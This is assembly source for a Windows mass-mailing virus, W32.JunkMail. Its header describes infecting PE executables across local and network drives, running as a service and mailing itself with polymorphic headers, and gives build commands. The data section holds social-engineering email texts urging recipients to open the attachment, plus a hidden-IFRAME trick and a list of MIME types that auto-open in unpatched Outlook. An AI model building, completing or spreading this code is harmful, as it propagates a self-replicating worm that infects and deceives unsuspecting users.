comment ;)
W32.JunkMail by roy g biv / RT Fishel
some of its features:
- parasitic resident (own process) infector of PE exe (but without looking at the file suffix)
- infects files in all directories on all fixed and network drives and network shares
- directory traversal uses a linked list instead of recursion to reduce stack size
- enumerates shares on local network and also random IP addresses
- reloc section inserter/last section appender
- runs as service in NT/2000/XP and service process in 9x/Me
- hooks all executable shell\open\command values
- slow mailer using polymorphic mail headers and transport (text/OLE2/binary)
- auto function type selection (Unicode under NT/2000/XP, ANSI under 9x/Me)
- uses CRCs instead of API names
- uses SEH for common code exit
- section attributes are never altered (virus is self-modifying but runs in writable memory)
- does not infect files with data outside of the image (eg self-extractors)
- infected files are padded by random amounts to confuse tail scanners
- uses SEH walker to find kernel address (no hard-coded addresses)
- correct file checksum without using imagehlp.dll :) 100% correct algorithm
- plus some new code optimisations that were never seen before W32.EfishNC :)
yes, just a W32.EfishNC remake with SMTP client engine
---
optimisation tip: Windows appends ".dll" automatically, so this works:
push "cfs"
push esp
call LoadLibraryA
---
to build this thing:
tasm
----
tasm32 /ml /m3 junkmail
tlink32 /B:400000 /x junkmail,,,import32
Virus is not self-modifying, so no need to alter section attributes
---
We're in the middle of a phase transition:
a butterfly flapping its wings at
just the right moment could
cause a storm to happen.
-I'm trying to understand-
I'm at a moment in my life-
I don't know where to flap my wings.
(Danny Hillis)
(;
.486
.model flat
;Imports linked into this build (tasm32/tlink32 with import32, see header).
;Per the header notes ("uses CRCs instead of API names") and the comment on
;expnames below ("API names are not present in replications, only in dropper"),
;these plain-name imports belong to the dropper/build path only.
;NOTE(review): the pairing of GetCurrentProcess + WriteProcessMemory with
;file read/write here is presumably the compress_only text-patching path
;described below; confirm against the code section, which is not in view.
extern GlobalAlloc:proc
extern CreateFileA:proc
extern GetFileSize:proc
extern GetModuleFileNameA:proc
extern ReadFile:proc
extern WriteFile:proc
extern CloseHandle:proc
extern GlobalFree:proc
extern GetCurrentProcess:proc
extern WriteProcessMemory:proc
extern MessageBoxA:proc
extern ExitProcess:proc
.data
;to alter the text here, set compress_only to non-zero then run
;in that case, the compressed text is written to a file only
compress_only equ 0
ife compress_only
;must be in reverse alphabetical order because they are stored on the stack
;API names are not present in replications, only in dropper
expnames db "WriteFile" , 0
db "WinExec" , 0
db "SetFileAttributesA" , 0
db "MoveFileA" , 0
db "LoadLibraryA" , 0
db "GlobalFree" , 0
db "GlobalAlloc" , 0
db "GetWindowsDirectoryA", 0
db "GetTickCount" , 0
db "GetTempFileNameA" , 0
db "GetFileAttributesA" , 0
db "GetCurrentProcess" , 0
db "DeleteFileA" , 0
db "CreateFileA" , 0
db "CloseHandle" , 0
regnames db "RegSetValueA" , 0
db "OpenSCManagerA" , 0
db "CreateServiceA" , 0
db "CloseServiceHandle", 0
exenames db "LoadLibraryA" , 0
db "GlobalAlloc" , 0
db "GetVersion" , 0
db "GetTickCount" , 0
db "GetStartupInfoW", 0
db "GetStartupInfoA", 0
db "GetCommandLineW", 0
db "GetCommandLineA", 0
db "ExitProcess" , 0
db "CreateProcessW" , 0
db "CreateProcessA" , 0
usrnames db "CharNextW", 0
db "CharNextA", 0
svcnames db "StartServiceCtrlDispatcherA", 0
krnnames db "lstrlenW" , 0
db "lstrcpyW" , 0
db "lstrcatW" , 0
db "UnmapViewOfFile" , 0
db "Sleep" , 0
db "SetFileTime" , 0
db "SetFileAttributesW" , 0
db "SetFileAttributesA" , 0
db "SetCurrentDirectoryW" , 0
db "SetCurrentDirectoryA" , 0
db "ReadFile" , 0
db "MultiByteToWideChar" , 0
db "MapViewOfFile" , 0
db "LoadLibraryA" , 0
db "GlobalFree" , 0
db "GlobalAlloc" , 0
db "GetVersion" , 0
db "GetTickCount" , 0
db "GetModuleFileNameA" , 0
db "GetFullPathNameW" , 0
db "GetFullPathNameA" , 0
db "GetFileSize" , 0
db "GetDriveTypeA" , 0
db "FindNextFileW" , 0
db "FindNextFileA" , 0
db "FindFirstFileW" , 0
db "FindFirstFileA" , 0
db "FindClose" , 0
db "CreateThread" , 0
db "CreateFileW" , 0
db "CreateFileMappingA" , 0
db "CreateFileA" , 0
db "CloseHandle" , 0
sfcnames db "SfcIsFileProtected", 0
ws2names db "socket" , 0
db "send" , 0
db "gethostbyname", 0
db "connect" , 0
db "WSAStartup" , 0
netnames db "WNetOpenEnumW" , 0
db "WNetOpenEnumA" , 0
db "WNetEnumResourceW", 0
db "WNetEnumResourceA", 0
db "WNetCloseEnum" , 0
ip9xnames db "NetShareEnum", 0
ipntnames db "NetShareEnum" , 0
db "NetApiBufferFree", 0
endif
;only 0dh is required for new line, since 0ah is appended by decompressor
user1 equ ' '
user2 equ '-'
user3 equ '/' ;the three most frequent characters
ourcid equ "EMAIL" ;something that users will open
smtp1 db offset smtp2 - offset $ - 2, "HELO ", 0
smtp2 db offset smtp3 - offset $ - 2, "MAIL FROM:<>", 0dh, 0
smtp3 db offset smtp4 - offset $ - 2, "RCPT TO:", 0
smtp4 db offset header1 - offset $ - 2, "DATA", 0dh, 0
header1 db offset header2 - offset $ - 2, "FROM: ", 0
header2 db offset subject1 - offset $ - 2, "SUBJECT: ", 0
;-----------------------------------------------------------------------------
;e-mail subject texts
;high bit set for list of phrases from which to choose randomly
;other bits are number of entries in list
;-----------------------------------------------------------------------------
subject1 db 83h
db offset subject1b - offset $ - 1, "Does this belong to you"
subject1b db offset subject1c - offset $ - 1, "Do you own this file"
subject1c db offset subject1d - offset $ - 1, "Is this your file"
subject1d equ $
subject2 db offset subject2b - offset $ - 1, " - "
subject2b db 0
header31 db offset header32 - offset $ - 2, ".ZIP", 0dh, "MIME-VERSION:", 0
header32 db offset part11 - offset $ - 2, "1.0", 0
part11 db offset part12 - offset $ - 2, "CONTENT-TYPE:", 0
part12 db offset part13 - offset $ - 2, "MULTIPART/MIXED;", 0
part13 db offset body1 - offset $ - 2, " BOUNDARY=", 0
;-----------------------------------------------------------------------------
;e-mail body texts
;high bit set for list of phrases from which to choose randomly
;other bits are number of entries in list
;-----------------------------------------------------------------------------
body1 db offset body2 - offset $ - 1
db 0dh, "I received this file from you yesterday "
body2 db 83h
db offset body2b - offset $ - 1, "afternoon"
body2b db offset body2c - offset $ - 1, "evening"
body2c db offset body2d - offset $ - 1, "morning"
body2d equ $
body3 db offset body4 - offset $ - 1
db ".", 0dh, "I think it was sent without you knowing by the "
body4 db 87h
db offset body4b - offset $ - 1, "Aliz"
body4b db offset body4c - offset $ - 1, "Badtrans"
body4c db offset body4d - offset $ - 1, "Goner"
body4d db offset body4e - offset $ - 1, "Klez"
body4e db offset body4f - offset $ - 1, "Magistr"
body4f db offset body4g - offset $ - 1, "Nimda"
body4g db offset body4h - offset $ - 1, "Sircam"
body4h equ $
body5 db offset body6 - offset $ - 1, " "
body6 db 83h
db offset body6b - offset $ - 1, "trojan"
body6b db offset body6c - offset $ - 1, "virus"
body6c db offset body6d - offset $ - 1, "worm"
body6d equ $
body7 db offset body8 - offset $ - 1, ".", 0dh
db "The filename was "
;be careful here: remember that line length is 76 characters
body8 db 83h
db offset body8b - offset $ - 1, "alter"
body8b db offset body8c - offset $ - 1, "chang"
body8c db offset body8d - offset $ - 1, "replac"
body8d equ $
body9 db offset bodya - offset $ - 1
db "ed but it looked like an important "
bodya db 85h
db offset bodyab - offset $ - 1, "database"
bodyab db offset bodyac - offset $ - 1, "document"
bodyac db offset bodyad - offset $ - 1, "picture"
bodyad db offset bodyae - offset $ - 1, "spredsheet" ;reduce size
bodyae db offset bodyaf - offset $ - 1, "video"
bodyaf equ $
bodyb db offset bodyc - offset $ - 1
db " inside.", 0dh, "You should look at this file to see what it is.", 0dh
bodyc db offset bodyd - offset $ - 1
db "The attachment might open automatically. This is normal behaviour.", 0dh
bodyd db offset bodye - offset $ - 1
db "If you see a prompt to Open or Save the email then choose Open.", 0dh
bodye db offset bodyf - offset $ - 1
db "If the attachment is blocked by Outlook 2002 then see", 0dh
bodyf db offset bodyg - offset $ - 1
db "http://support.microsoft.com/support/kb/articles/q290/4/97.asp", 0dh
bodyg db 0
part21 db offset part22 - offset $ - 2, "TEXT/HTML", 0
part22 db offset part23 - offset $ - 2, 0dh, "CONTENT-TRANSFER-ENCODING:", 0
part23 db offset part24 - offset $ - 2, "QUOTED-PRINTABLE", 0
part24 db offset content - offset $ - 2, 0dh, 0dh, "<IFRAME SRC=CID:", ourcid, " WIDTH=0>", 0
;-----------------------------------------------------------------------------
;these types open without prompt in unpatched Outlook
;-----------------------------------------------------------------------------
content db 9bh ;total of exploited, CIDs, and not-exploited types
db offset autorunb - offset $ - 1, "APPLICATION/X-MPLAYER2;"
autorunb db offset autorunc - offset $ - 1, "AUDIO/AIFF;"
autorunc db offset autorund - offset $ - 1, "AUDIO/MID;"
autorund db offset autorune - offset $ - 1, "AUDIO/MIDI;"
autorune db offset autorunf - offset $ - 1, "AUDIO/MPEG;"
autorunf db offset autorung - offset $ - 1, "AUDIO/X-MID;"
autorung db offset autorunh - offset $ - 1, "AUDIO/X-MIDI;"
autorunh db offset autoruni - offset $ - 1, "AUDIO/X-MPEGURL;"
autoruni db offset autorunj - offset $ - 1, "AUDIO/X-MS-WAX;"
autorunj db offset autorunk - offset $ - 1, "AUDIO/X-MS-WMA;"
autorunk db offset autorunl - offset $ - 1, "AUDIO/X-WAV;"
autorunl db offset autorunm - offset $ - 1, "MIDI/MID;"
autorunm db offset autorunn - offset $ - 1, "VIDEO/MSVIDEO;"
autorunn db offset autoruno - offset $ - 1, "VIDEO/QUICKTIME;"
autoruno db offset autorunp - offset $ - 1, "VIDEO/X-IVF;"
autorunp db offset autorunq - offset $ - 1, "VIDEO/X-MPEG;"
autorunq db offset autorunr - offset $ - 1, "VIDEO/X-MPEG2A;"
autorunr db offset autoruns - offset $ - 1, "VIDEO/X-MS-ASF;"
autoruns db offset autorunt - offset $ - 1, "VIDEO/X-MS-ASF-PLUGIN;"
autorunt db offset autorunu - offset $ - 1, "VIDEO/X-MS-WM;"
autorunu db offset autorunv - offset $ - 1, "VIDEO/X-MS-WMV;"
autorunv db offset autorunw - offset $ - 1, "VIDEO/X-MS-WVX;"
autorunw equ $
;-----------------------------------------------------------------------------
;these are types that display the CID instead of the filename,
;so using a good choice for CID (eg email) will make many users open it
;-----------------------------------------------------------------------------
db offset usecidb - offset $ - 1, "APPLICATION/FUTURESPLASH;"
usecidb db offset usecidc - offset $ - 1, "APPLICATION/HTA;"
usecidc db offset usecidd - offset $ - 1, "APPLICATION/X-SHOCKWAVE-FLASH;"
usecidd db offset usecide - offset $ - 1, "TEXT/X-SCRIPTLET;"